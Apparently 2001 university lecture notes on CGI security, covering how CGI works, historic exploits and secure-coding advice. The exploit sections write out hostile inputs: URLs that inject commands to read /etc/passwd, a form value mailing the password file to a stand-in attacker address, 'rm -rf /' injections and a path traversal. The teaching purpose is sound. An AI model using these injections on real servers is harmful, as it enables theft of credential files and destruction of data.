CEG 499/699:
Internet Security


College of Engineering & CS
Wright State
Dayton, Ohio 45435-0001

CGI Vulnerabilities

 

Prabhaker Mateti

 
Abstract:  CGI stands for Common Gateway Interface.  A so-called web application is a CGI program written in compiled languages such as C, or interpreted languages such as Perl.  Such an application is split between the web browser client and the web server.  Not only the more traditional attacks such as buffer overflow therefore work on CGI programs, simpler exploits are possible via clever uses of meta characters, and manipulation via temporary files. This article is an overview of these CGI vulnerabilities, and how they can be prevented.
 
This work is supported in part by NSF DUE-9951380.
   

Table of Contents

  1. Educational Objectives
  2. Overview of CGI
    1. An Example of How  a CGI Script is Invoked
    2. CGI Meta (Environment) Variables
    3. The GET and POST Methods
    4. Location of CGI Programs
    5. Output of a CGI Program
  3. Typical CGI Exploits
    1. A Phone-Book-Functionality Script Exploit
    2. A Whois Script Exploit
    3. A Simple Shell Breach
    4. An UnHexifying CGI program Exploit
    5. Vulnerability in viewsrc.cgi
    6. Remote buffer overflow in post-query
    7. Other Breaches
  4. Secure the Web Server

    1. Securing the Server Machine

    2. Securing the Web Server Program

    3. Secured Installation of the CGI Scripts

  5. Secure CGI Programming

    1. Validate Scripts Borrowed from the Web

    2. Common Assumptions That Can Be False

    3. Never Accept Unchecked Input

    4. Cookie Caution

    5. Server-side Includes

    6. Redirection of HTTP Requests

    7. OS Environment

    8. Checking the Result Codes

    9. SUID CGI Scripts

    10. C

    11. Shell

    12. Perl

    13. Python

  6. CGI Scanners

  7. Lab Experiment
  8. Acknowledgements
  9. References

1. Educational Objectives

  1. Overall idea of what a CGI program needs to do to function.
  2. Describe vulnerabilities of CGI programs
  3. Describe defensive techniques

2. Overview of CGI

CGI stands for Common Gateway Interface.  The word "gateway" is unrelated to its use in networking as a synonym for routers.  CGI is a standard that a class of programs invoked via a web client are expected to follow.   CGI is a standard that allows the web-server to execute a separate program in order to generate content. For example,  http://www.example.com/cgi-bin/homepage.pl?user=rob runs the program homepage.pl located in the directory named cgi-bin.  This program is supplied with user=rob in a so-called meta-variable, in order to generate content specific to the user "rob".  Interactive web sites, as well as e-commerce sites, typically use some form of CGI scripting to produce their output.

CGI programs are written in script languages such as Perl, Python, and Microsoft ASP, in traditionally compiled languages such as C, as well as in byte-code languages such as Java.  The privileges and the abilities of the CGI program are controlled by the web server, and file permissions and access control lists.  The triggering URL embeds the users input, if any.  The URL may be essentially pre-built or built on the fly by an applet running in the web client program. The end result of invoking a CGI program is that it returns a sufficiently long string that constitutes a valid HTML page.

The front end interface to a CGI program is an HTML document called a form. Forms include the HTML tag <INPUT>. Each <INPUT> tag has a variable name associated with it. The contents of the variable forms the value portion of the variable=value token . Form data is a stream of variable=value pairs separated by the & character.  Actual CGI scripts may perform input filtering on the contents of the <INPUT> field. Another HTML tag sometime seen in forms is the <SELECT> tag which allows the user on the client side to select from a finite list of choices.

2.1 An Example of How  a CGI Script is Invoked

The following is an illustration of how a form submission on the client machine generated a triggering URL and how the corresponding CGI program is invoked on the server. 

  1. The client fetches the HTML form page from a server.  The form happens to be a simplified version of a form from the search engine Google.


    Here is the HTML code for the above.

    <form action="http://www.google.com/search" method="get" name="f">
    <input type=
    "text" name="q" size="50" maxlength="256"><br>
    <input name=
    "btnG" type="submit" value="Google Search">
    <input name=
    "btnI" type="submit" value="I'm Feeling Lucky">
    </form>

  2. The user fills out the form (in the white rectangle above of size 50, input field named q of type text of expected maximum length 256) on the client machine.  Suppose our search request is for "CGI vulnerability scanners".
  3. The user presses "Google Search".  The associated type is submit, input field named btnG valued "Google Search" so the browser generates the following URL: http://www.google.com/search?q=CGI+vulnerability+scanners&btnG=Google+Search
    that embeds the users inputs. The plus character is traditional representation here for a space.
  4. The request is sent out. 
  5. The host named www.google.com receives this request on port 80 and sends it to the http server process. 
  6. This process Constructs appropriate environment variables with values dictated by q=CGI+vulnerability+scanners&btnG=Google+Search. This process follows its configuration rules in locating where the CGI  program named search is, and invokes it.   This invocation is generally via forking a child process with the same privileges as the web server, and then exec-ing the program.

2.2 CGI Meta (Environment) Variables

CGI uses meta  variables (used to be called environment variables) to send the CGI program its parameters. Here are three variables (QUERY_STRING , PATH_INFO, and PATH_TRANSLATED) relevant for us right away. 

QUERY_STRING is defined as anything which follows the first ? in the URL. This information could be added either by an ISINDEX document, or by an HTML form (with the GET action). It could also be manually embedded in an HTML anchor.  This string is encoded in the standard URL format of changing spaces to +, and encoding special characters with %xx hexadecimal encoding.  The web servers parses the query string into the standard argv[] array.  For example, the query string "CGI vulnerability scanners" would be given to your program with argv[1]="CGI" and argv[2]="vulnerability", argv[3]="scanners".  Note that a %00 in the QUERY_STRING will be turned into the string termination character. 

PATH_INFO suggests file locations to the CGI program.  Suppose the URL for a CGI program foobar is http:/ /foo.bar.org/cgi-bin/foobar. Upon receiving the URL  http:/ /foo.bar.org/cgi-bin/foobar/extra/path/info/,  the web server will set PATH_INFO  to "/extra/path/info/".  The server also initializes the PATH_TRANSLATED environment variable to the full path name of "/extra/path/info/" by prepending with the path of the DocumentRoot of the server.

2.3 The GET and POST Methods

If  the form has METHOD="GET" in its FORM tag, the CGI program will receive the encoded form input in the environment variable QUERY_STRING.

If  the form has METHOD="POST" in its FORM tag, the CGI program will receive the encoded form input on stdin. However, the end of input must be detected by using the value of  the environment variable CONTENT_LENGTH.

2.4 Location of CGI Programs

Most CGI programs reside in a directory named cgi-bin.  The full-path name of this directory can be whatever, but a typical web server is configured so that the CGI program appears to be at the root as in /cgi-bin.

2.5 Output of a CGI Program

CGI programs can return a myriad of document types: an image file, an HTML document, a plain text document, an audio clip, etc. They can also return references to other documents. In order to inform the web server what kind of document the CGI program is returning, CGI requires a header consisting of a few lines.  The return types are essentially of two kinds.

  1. A full document with a corresponding MIME type

    In this case, you must tell the server what kind of document you will be outputting via a MIME type. Common MIME types are things such as text/html for HTML, and text/plain for straight ASCII text.

    For example, to send back HTML to the client, the output from CGI program should be:

            Content-type: text/html
    
            <HTML><HEAD>
            <TITLE>HTML output from CGI script</TITLE>
            </HEAD><BODY>
            <H1>Sample output</H1>
            What do you think of <STRONG>this?</STRONG>
            </BODY></HTML>
    
  2. A reference to another document

    Instead of outputting the document, you can just tell the browser where to get the new one, or have the server automatically output the new one for you.

    For example, say you want to reference a file on your Gopher server. In this case, you should know the full URL of what you want to reference and output something like:

    	Content-type: text/html
    	Location: gopher://httprules.foobar.org/0
    
       	<HTML><HEAD>
       	<TITLE>Sorry...it moved</TITLE>
       	</HEAD><BODY>
       	<H1>Go to gopher instead</H1>
       	Now available at
       	<A HREF="gopher://httprules.foobar.org/0">a new location</A>
       	on our gopher server.
       	</BODY></HTML>
    

3.Typical CGI Exploits

CGI programs contain many security holes. Although the CGI protocol is not inherently insecure, CGI programs must be written with as much care as any other program that may be invoked by untrusted users with deviously constructed inputs.  It is also typical that Web administrators are less skilled in security matters than the typical system administrators, and install CGI programs at their sites without realizing the associated problems. The vulnerabilities caused by the use of CGI scripts are not weaknesses in CGI itself, but are weaknesses inherent in the HTTP specification and in various system programs. CGI simply allows easier access to those vulnerabilities. There are, of course, other ways to exploit. For example, insecure file permissions can be exploited using FTP or telnet.

CGI exploits take advantage of weaknesses in the web server.  By definition, a CGI exploit does not "work" on the client.  Exploits on the web client side are, of course, possible via applets (in Java, JavaScript, ActiveX, VBScript, etc).

The CGI specification permits reading files, and acquiring shell access.  A clever script can corrupt file systems on server machines and their attached hosts. Past CGI exploits have caused such things as unauthorized manipulation (such as removing, inserting, or altering) data from the Web server,  reducing performance, halting services,  being used to perform the act, or using the Web server as a Trojan horse into other systems, including your local intranet.  Means of gaining access include exploiting assumptions made by the script that it does not check for, exploiting weaknesses in the server environment, and exploiting weaknesses in other programs and system calls. The primary weakness in CGI scripts is insufficient "input" validation.

The Appendix titled A List of Specific CGI Scripts Exploited gives a fairly complete list as of June 2001.  Below we describe a few selected examples so that the reader has better appreciation of the issues.

3.1 A Phone-Book-Functionality Script Exploit

The most notorious of the CGI vulnerabilities are due to sloppy filtering of the user input. This vulnerability allows an attacker to execute any command on a Web server with the permissions of the process running the Web server.

The "phone book functionality" (PHF) script uses a form-based interface to get a name as input and look the name and address information up on the server. The exploit described here uses it to display the password file (as a Web page), which can then be run through a cracker (like crack).  The script was included as a CGI example with the NCSA and Apache httpd servers.

Unfortunately, the PHF script did an incomplete job of checking its inputs for tricks. The script used a call to escape_shell_cmd(), a function that was supposed to cleanse input of "special characters." The function failed to check for one particular character, the newline character (\n or 0x0a). A knowledgeable attacker can thus provide input to the form (through a URL) that includes a newline character. So a  URL such as

http://www.university.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

passes the filtration unchanged.  The /bin/cat /etc/passwd pushes the content of the local (i.e., on the web server) password file to the client.

The PHF script was so widely exploited that most intrusion detection tools now check for its presence.

3.2 A Whois Script Exploit

*A prime example of a security risk is setting up a form that allows one to enter arbitrary system commands. A "whois" CGI script can be written that will directly make a "whois" system call with the domain name provided and return information in regards to that domain name. Since this is part of a UNIX system command, one could enter something like "; rm -fr /*" which would essentially remove any file on the Web server that the Web server owns, including log files, and not perform the intended function of looking up a domain name. This type of script properly written would check the input for a valid domain name with only alphanumeric characters and delimited by a period before making the system call to "whois".

3.3 A Simple Shell Breach

Suppose a form lets a user e-mail a message to a specified person. The HTML form page will include code like the following:

  <INPUT TYPE="radio" NAME="send_to" VALUE="pmateti@cs.wright.edu">Mateti<br>
  <INPUT TYPE="radio" NAME="send_to" VALUE="
lball@lanl.gov">Lucille Ball<br>
  <INPUT TYPE="radio" NAME="send_to" VALUE="gburns@lanl.gov">George Burns
Now let's say we execute a script that writes the message to a temporary file and then e-mails that file to the selected address. In Perl, this could be done with
system("/usr/lib/sendmail -t $send_to < $temp_file");
As long as the user selects from the addresses that are given, everything will work fine. There is however no way to be sure. Because the HTML form itself has been transferred to the user's client machine, he/she is free to edit it to read something like
<INPUT TYPE="radio" NAME="send_to" VALUE="aarkin@lanl.gov;mail
  badguy@evil-empire.org </etc/passwd"> Alan Arkin<br>
As soon as this gets sent, the original sendmail call will stop at the semicolon, and the system will execute the next command--which would mail the password file to the user, who could then easily decrypt it and use it to gain login access to your machine.

3.4 An Exploit of UnHexifying

This PERL program converts characters represented by their ASCII hex code string values in a URL to their actual character codes.  It is similar to the "echo" command (built-in of bash).

  #!/usr/bin/perl
  # usage: http://your.host/cgi-bin/echo?

  # Echos back the QUERY_STRING to the user.


  $| = 1;
  $in = $ENV{'QUERY_STRING'};
  $in =~ s/%(..)/pack("c",hex($1))/ge;

  # Escape the nasty metacharacters
  # (List courtesy of http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
  $in =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;

  print "Content-type: text/html\n\n";
  system("/bin/echo $in");   

Install this program in cgi-bin/echo and the URL

     http://your.host/cgi-bin/echo?hello%20there 

will return a page containing the text

"hello there"

Inserting %0A, the code for the new-line character (the %20 represents the blank), and one can exploit the shell to run any command you wish.  For example, the URL

     http://your.host/cgi-bin/echo?%0Acat%20/etc/passwd

will bring in a page with a copy of the /etc/password file. 

3.5 Vulnerability in viewsrc.cgi

[Posted on 24.5.2001. by joetesta@hushmail.com.  This is an example how the vulnerability and its fix are generally described.]

viewsrc.cgi v2.0 is a source-code viewing CGI script available from http://www.mimanet.com/scripts. A vulnerability exists which allows a remote user to view any file on the server. The following URL demonstrates the problem: http://localhost/cgi-bin/viewsrc.cgi?loc=../[any file outside restriced dir]

Apply the following patch to viewsrc.cgi:

53a54,56
>$FORM{'loc'} =~ s/\.\.//g;
>$FORM{'loc'} =~ s/\\//g;
>$FORM{'loc'} =~ s/\///g;
65c68
<open (INHTML, "$predo") or die &err_loc;
---
>open (INHTML, "<$predo") or die &err_loc;

This patch removes any '..', '/', or '\'s present in the $FORM{'loc'} variable. It also makes the open() command safer by using the '<' read-only specifier.

Vendor Status:  MIMAnet was contacted via <webmaster@mimane t.com>on Tuesday, May 1, 2001. Roberto R. Morelli <morelli@altair7.com >quickly replied and stated that the problem was verified and an official fix would be released. Twenty two days have passed, and nothing has been done.

3.6 Remote buffer overflow in post-query

[Posted on 11.5.2001; http://www.energymech.net/users/proton/]

The overflow condition is very easily exploitable, since the code actually supplies the pointer to the exploit code itself, odd as it may seem. The pointer thusly does not need to be second-guessed at all, making life much easier for crackers.

#define MAX_ENTRIES 10000


typedef struct {
	char *name;
	char *val;
} entry;

...

main (int argc, char *argv[])
{
	entry entries[MAX_ENTRIES];
	...
	for(x=0; cl && (!feof(stdin)); x++) {
		m=x;
		entries[x].val = fmakeword(stdin,'&',&cl);
		plustospace(entries[x].val);
		unescape_url(entries[x].val);
		entries[x].name = makeword(entries[x].val,'=');
	}
}
"Fellow C programmers would surely see the problem right away. By feeding 10,000 bogus entries, and then sending a specially prepared buffer for the 10,001'th, you get a situation where memory is allocated, the exploit code is written into it and the pointer is then put into the 10,001'st position of the entries struct. This happens to be the position of the return pointer. When the program ends, it does not call `exit' as I would say most network applications should, instead it returns to __start, or in a case where the return pointer has been overwritten, it returns to the user-supplied code. The only problem with this exploit is that `fmakeword' allocates 102400 bytes for each buffer. Before you think that the problem then becomes entirely theoretical, consider that most modern kernels do not give the programs actual physical memory until the memory is written to. A fair estimate would be that to be vulnerable the server would need around 40-50MB of physical and/or virtual memory, but I cant say for certain. To sum it up, this exploit is real, you may be vulnerable if you have the post-query CGI on your web servers (and it is *very* common). You may be lucky enough to have an OS that prohibits the application from successfully allocating the needed memory. Better safe than sorry; Remove the program if you have it! No one should really need this type of application since it is a sample program designed to demonstrate how CGI works."

3.7 Other Breaches

CGI can also be exploited to A number of vulnerabilities are due to those inherent in certain programs typically invoked by CGI programs. E.g.,

4. Secure the Web Server

4.1 Securing the Server Machine

Start with a properly configured server, applying all the recommendations of [Mateti 2001]. This includes appropriate screening at the router, turning off un-needed daemons, and restricting the file system. Additional precautions may be required, depending upon the partition in which you are working, who the intended audience is, and the sensitivity level of the data on the machine. These precautions including monitoring who accesses the scripts and the other activities those users perform, and consulting with your computer security officer as needed.

4.2 Securing the Web Server Program

  1. Do not run web servers as root.  Create an ordinary un-privileged pseudo-user login id, typically named www, and group www.
  2. Don't configure CGI support on Web servers that don't need it.
  3. Get rid of CGI script interpreters in bin directories: http://www.cert.org/advisories/CA-96.11.interpreters_in_cgi_bin_dir.html

  4. Run your Web server in a chroot()ed environment to protect the machine against yet to be discovered exploits 

4.2.1 Apache

4.2.2 IIS

4.2.3 MS Personal Web Server

4.2.4 Zope

4.3 Secured Installation of the CGI Scripts

  1. Remove unsafe CGI scripts.  Widely-exploited CGI scripts include: Count.cgi, test-cgi, php.cgi, handler, webgais, websendmail, webdist.cgi, faxsurvey, htmlscript, pfdisplay, perl.exe, wwwboard.pl, www-sql, service.pwd, users.pwd, aglimpse, man.sh, view-source, campas, and nph-test-cgi. Simple scanning tools like cgiscan look for these problematic scripts in the usual location. See the list in the Appendix.

  2. Note that successful input validation attacks have been seen against ASP and Cold Fusion Markup Language (CFML) programs as well, so cgi-bin alone is not the only server-side functionality that introduces security problems. If you have to provide server-side programs, think carefully about how you handle input.

5. Secure CGI Programming

5.1 Validate Scripts Borrowed from the Web

There are many CGI archive sites on the web. But, many of them do not take security concerns seriously. Before installing , system administrators should evaluate the CGI code by reading it and should test the CGIs using web page forms. Tests should invoke commands on the system which, if successful, leave an observable change in the system or file volume. For example, one such test is the creation of a harmless file. Assume the server is running as user ``nobody''.  The typical /tmp directory is world-writeable. A harmless test is touch /tmp/gotcha. This command would simply create a file named ``gotcha'' in the /tmp directory. Some examples of URLs that might be sent to a CGI program are:
http://myserver/cgi-bin/finger?dave; touch%20/tmp/gotcha
http://myserver/cgi-bin/finger?dave; touch+/tmp/gotcha

If it is possible to send a form or URL that successfully executes this command, then in principle any command-line argument could be sent. The CGI script should then be reworked until it is not possible to send any unwanted system command.

5.2 Common But Invalid Assumptions

  1. HTTP_REFERER indicates what web page the user previously visited. This header is submitted depending on the choices made in the web browser. It can be spoofed or otherwise manipulated. A common oversight is to depend on the Referer header to restrict incoming application requests to a certain subset of HTML pages or determine a course of action based on from where the application requests are referred.
  2. <input type="hidden"> elements are really hidden.  An application "hides" passwords, credit-card numbers and other sensitive information in these tags. This element is submitted along with the user data back to the CGI application, but the element is not shown to the user.  However, most browsers let you view the HTML source. You can see the <input type="hidden" value="sensitive info"> tag, along with the sensitive information. The solution is to assume hidden information is not private, and to make sure all sensitive information is transmitted over SSL.
  3. <input type="password"> is secure for handling passwords.  Similar to the hidden form element, the password form element provides an input box that permits a user to enter sensitive information that does not echo back on the screen. Unfortunately, when the user finally sends the information, it travels to the server in clear text. If the form uses the get method, the password travels as part of the URL permitting everything from the user's local browser to Web proxies to save a copy of the password. The password may even appear in the Web server's request log. Therefore, your application should not use the get method when dealing with sensitive form information.
     
  4. All submitted data will be coming from our own Web applications and HTML pages. "It's important to understand how HTTP works: The user contacts your server and retrieves the HTML with the form parameters (which input boxes to show, which radio buttons to select and so on). The user disconnects from the Web server, enters/manipulates the form data, and finally makes another request to your server to send back the data. The key is that there's no guarantee that because you sent three input boxes to the user, you'll receive three input boxes back. Since the user is sending you the form data unrelated to any other server connection, he or she can submit more or less data without constraints. This means your application needs to check carefully to see if all required form elements are returned." 
  5. <input size=##> allows the application to limit the amount of incoming data.  The size parameter should be thought of as a suggestion for the maximum amount of data the user may send. But since it's only a suggestion, the user isn't required to abide by it. An attacker can use custom browsers and submission scripts that submit whatever data the attacker wishes, regardless of size restraints. Your application should verify the amount of incoming data. 
  6. Client-side JavaScript/VBScript validation will help remove bad data. An attacker can submit data using custom browsers or other programs. Also, most browsers permit turning off Web scripting, thus defeating client side validation routines. Your application must contain all the logic needed to validate data. 
  7. We can limit user selections by providing list boxes and drop-down menus. HTML provides the <SELECT> tag to let a Web page present a menu list of choices. For example, the menu choices may be "Aleph1," "Mnemonix" and "RFP." However, there's no guarantee that the returned answer is any of those choices. Your Web application must verify that the returned choice is one from the list.
  8. The fields in the QUERY_STRING variable will match the ones in my page. The QUERY_STRING variable will correspond to something that could be validly transmitted by the HTTP specifications.

5.3 Validate All Arguments and Inputs Passed

CGI programs are called with user given inputs as arguments.  These arguments must be analyzed for actual data expected for each incoming entry. For instance, the syntax of a phone number, a monetary amount, a name, a mailing address and so on, can all be rigorously described using formal language grammars. 

The input given may contain meta-characters, such as dot, comma, semicolon, slash, exclamation etc.  Make sure that these are permissible in the given context.  The following characters in user-supplied data should be examined carefully, and if suspect, should be "escaped":

      ;<>*|`&$!#()[]{}:'"/\n
For server-side includes, check for "<" and ">" in order to identify and validate any embedded HTML tags.

Disallow slashes, dots, etc. Look for any occurrence of "/../" (which might indicate that the user is attempting to access higher levels of the directory structure).

5.4 Calling Other Programs

CGI applications have to be careful when passing user data on the command line for calls to other programs. An attacker can trick your application into executing extra commands or modifying parameters of running programs by submitting data that will be interpreted as command-line switches or options.

Suppose you are invoking grep on a text database and that a form provides the regular expression.  The naïve approach

system("grep $exp database");
or the equivalent has a number of problems. What if exp has the value ``root /etc/passwd;rm''? Not only does it grep the wrong file, it also deletes the real database.
system("grep \"$exp\" database"); 
Neither double nor single quotes actually solve the problem. E.g., with double quotes exp could be ```rm -rf /`''. Single quotes avoid this but both suffer from problems like ``'root /etc/passwd;rm'''. The quotation marks match with the ones that will enclose the variable, completely negating their effect.  
system("grep", "-e", $exp, "database");
It is unnecessary to escape characters if you invoke programs as above.
$exp =~ s/[^\w]/\\\&/g; system("grep \"$exp\" database"); 
or
for (i=0,p=tmp2;exp[i];i++) {
	if (!normal(exp[i])) *(p++)='\\';
	*(p++)=exp[i];
}
*p=0;
sprintf(tmp, "grep \"%s\" database", exp);
system(tmp);
The above solutions handle all the problems discussed so far. E.g., if exp were -i, grep would try to find the string ``database'' in its standard input. Using the ``-e'' option to grep would prevent this. In general you never want to call a program that cannot tell that an argument isn't a switch unless you can restrict the possible values for exp. GNU utilities are really good this way since they specify ``--'' as an end of switch marker.

5.5 Cookie Caution

Cookies are  data that a web application can request the web client to store in the file system of the client. The web client program is expected to send the cookie back to the application upon request.  Cookies do not use any encryption.  Cookies are sent to all pages on the same server. Unless the Web application defines a restrictive path for the cookie, all Web applications on the same server (the one that sent the cookie) have access to the user's cookies. For example, after using an administrative Web application that stores the administrator password in a cookie, every page the administrator goes to on the same server can  receive the cookie with the password in it.

5.6 Server-side Includes

Any of the following HTML comments would be a security hole:

<!--#exec cmd="rm -rf /"-->
<!--#include file="secretfile"-->
The second command is not as general as the first, and less likely to be a security hole if the web servers restrict the content of the file name. The simplest protection measure  is to not permit the web server to parse the document for server-side includes.

5.7 Redirecting Requests

Redirecting HTTP requests bypasses access control rules. A less likely problem is redirecting the FILE protocol. It allows any file readable by the CGI to be accessed.  Some mechanisms for redirecting HTTP requests that handle both GET and POST requests may allow PUT and DELETE. Verify that PUT and DELETE requests are not accepted by the web server. 

5.8 CGI programs in C

Occasionally an author expresses a preference for compiled programs over  interpreted scripts (in languages such as shell, Perl, or Python).  Such an author believes the binary is more difficult to make sense of if a user is able to get a copy of it, and also because it makes it more difficult for the user to search for potential weaknesses within the binary.  This is security via obscurity.  The more essential point however is that the interpreter of the scripts generally permits powerful manipulation of text strings, parses the source of the script late, and does a late binding.

Most C programs use arrays without doing bounds checking, and also have arbitrary limits on array sizes.    This enables the "buffer overflow" technique which can corrupt a program's stack so that arbitrary commands can be executed.

5.9 CGI programs in Perl

PERL gives the CGI programmer just about everything that she needs ... including a rope long enough to hang herself with.  In a previous section we considered the problem of calling the utility grep. This is a bit silly in PERL since we can easily use the regular expression facility in PERL:
while( <FILE> ){ print if /$exp/; }
This code will not cause anything nasty to be executed. The problem with this code is that an error in exp will cause the CGI script to get a compilation error (which the httpd will probably report as a server internal error). This is a poor way to handle incorrect input. Rather than manually check the syntax of a PERL regular expression, we can have PERL safely check it for us.
&complain("Illegal regexp.") if !defined eval { if ("a" =~ /$exp/){}0;};
The eval was used as an exception handling mechanism. There are several ways of invoking eval. Summarizing from the PERL man pages, eval $x or eval "$x" is not safe, where as eval { ... $x ... } or eval '... $x ...' is safe.  Here x is used as a string/number/whatever inside the code in the curly braces or single quotes. 

Perl provides a mechanism, via a special version of Perl  called ``taintperl'',  to prevent user-defined variables (such as those from forms) to be used in eval(), system(), exec() or piped open() calls. Under this option it will also disallow calling an external program without explicitly setting the PATH environment variable at the beginning of the script. 

Beware the eval statement.  PERL and shells provide an eval command which construct a string and have the interpreter execute that string. This can be very dangerous. Observe the following statement in the Bourne shell:

eval `echo $QUERY_STRING | awk 'BEGIN{RS="&"} {printf "QS_%s\n",$1}' `

This clever little snippet takes the query string, and convents it into a set of variable set commands. Unfortunately, this script can be attacked by sending it a query string which starts with a ;. 

 

5.10 OS Environment

[ack author]

Avoid writing to publicly writable directories (such as /tmp). Creating a directory in /tmp is good provided that programs can handle the directory disappearing between invocations of the CGI script. It is easy for malicious people to create symbolic links to important files or directories -- always make sure that the file you open is the file that you wanted to modify.

The default umask of many httpds is 0; that is, any file created by a CGI script will be world-writable by default. The umask should probably be set to 022 (allows others to read the file) or 077 (permits no access to anyone).

Users need to execute CGI scripts, but there is no reason for them to have read or write permissions. Similarly, users need to read the HTML driver files (and to read and execute their directory), but there is no need for them to have write or execute permission to the files (or write permission to their directory).

These controls are most easily maintained as follows:

5.11 Check the Result Codes

open (MAIL,"|-") || exec '/usr/lib/sendmail','-t','-oi';

Suppose the fork (in the open above) fails. The sendmail process is then connected directly to the client. It is possible to make fork fail by simply overloading the server.  Check for the success of the fork like this:

$pid = open(MAIL, "|-");
defined ($pid) || die "fork: $!";
if (!$pid) { exec '/usr/lib/sendmail', '-t', '-oi' || exit 255; }

5.12 SUID CGI Scripts and CGIwrap

Most web servers do not change user ID to a CGI script's owner. Instead they run the program as ``nobody'' or use a program like CGIwrapto change user ID. CGI scripts available on the net (guest books, counters and less trivial programs) assume that the CGI script will be run as nobody so they require either files to be world-writable or CGIs to be SUID.

Making scripts SUID is dangerous if you can't trust people that have access to the machine that the script is running on.  SUID scripts have many more potential security holes than normal CGI scripts. On some operating systems it is impossible to have a secure SUID shell script. The simplest methods for attacking SUID scripts rely on setting environment variables maliciously. Almost all versions of csh are completely unsafe. (PERL calls csh to evalutate ``<*.h>'' so never use that construct in a SUID PERL program -- taint checks won't catch this problem).

The program CGIwrap is a good way to allow users to run CGIs under their own UID. 

6 CGI Scanners

Current CGI vulnerability scanners check for as many as 200 vulnerable CGIs. Below is a list of cost-free scanners.

Sitescan CGI scanner!Good if you look size! 16Kb
ATLAS CGI hole scanner! 28Kb
Voideye CGI vulnerability scanner! Scans 78 different vulnerabilityes. 163Kb
Whisker 3.1a Scans for over 200 known CGI vulnerabilities. 50Kb
CGI scan v2.0 Scan your network for cgi exploits. (Some texts about cgi exploits are included in the .zip file.) 50Kb
Webcheck An excellent scanner, a lot of options. 263Kb
TWWWscanner 0.3 Windows based www vulnerability scanner which looks for 186 CGI vulnerabilities .Displays http header, server info, and tries for accurate results. 263Kb
ShadowSecurityScanner v1.00.009 A freeware security scanner which checks for 17 FTP, 22 SMTP, 10 POP3 and 132 CGI vulnerabilities. 1164Kb
nessus    

 


Lab Experiment


Acknowledgements  These lecture materials are gleaned from many sources.  All are presented after careful reading.   In some cases, I may have unintentionally neglected proper attribution. I assure the reader it is not because I claim authorship.  Indeed, in the lectures there is hardly any thing new that I have contributed.  Suggestions for improvement always welcome. 


References

  1. Gary McGraw and John Viega, Make your software behave: CGI programming made secure, March 28, 2000, http://www-106.ibm.com/ developerworks/ library/ secure-cgi/
  2. CGI Vulnerabilities  http://bau2.uibk.ac.at/matic/cgi2.htm
  3. The CGI authoring newsgroup (news:comp.infosystems.www.authoring.cgi)
  4. Lincoln Stein's "WWW Security FAQ" (http://www-genome.wi.mit.edu/WWW/faqs/www-security-faq.html)
  5. Paul Phillips' "Safe CGI Programming" (http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt)
  6. Michael Van Biesbrouk's "CGI Security Tutorial" (http://csclub.uwaterloo.ca/u/mlvanbie/cgisec/)
  7. http://www.cerf.net/~paulp/cgi-security/safe-cgi.txt
  8. W3C Security FAQ at http://www.w3.org/Security/Faq provided by Lincoln D. Stein
  9. ttp://www.networkcomputing.com/1105/1105ws1.html
  10. Gregory Gilliss,CGI Security Holes, Phrack 49, Volume Seven, Issue Forty-Nine, File 08 of 16
  11. PHP Manual Chapter 4: Security: www.php.net/manual/security.php3
  12. Perl CGI FAQ: Security: www.perl.com/pub/doc/FAQs/cgi/perl-cgi-faq.html#Q5.1
  13. NT Web Technology Vulnerabilities: www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2
  14. rain.forest.puppy, Perl CGI Problems, Phrack Magazine, Vol. 9, Issue 55,  file 07 of 19, Sept 09, 1999.
  15. pm-cgiExploitsList.htm
08/10/01 02:42:31 AM
Open Content Copyright © 2001 pmateti@cs.wright.edu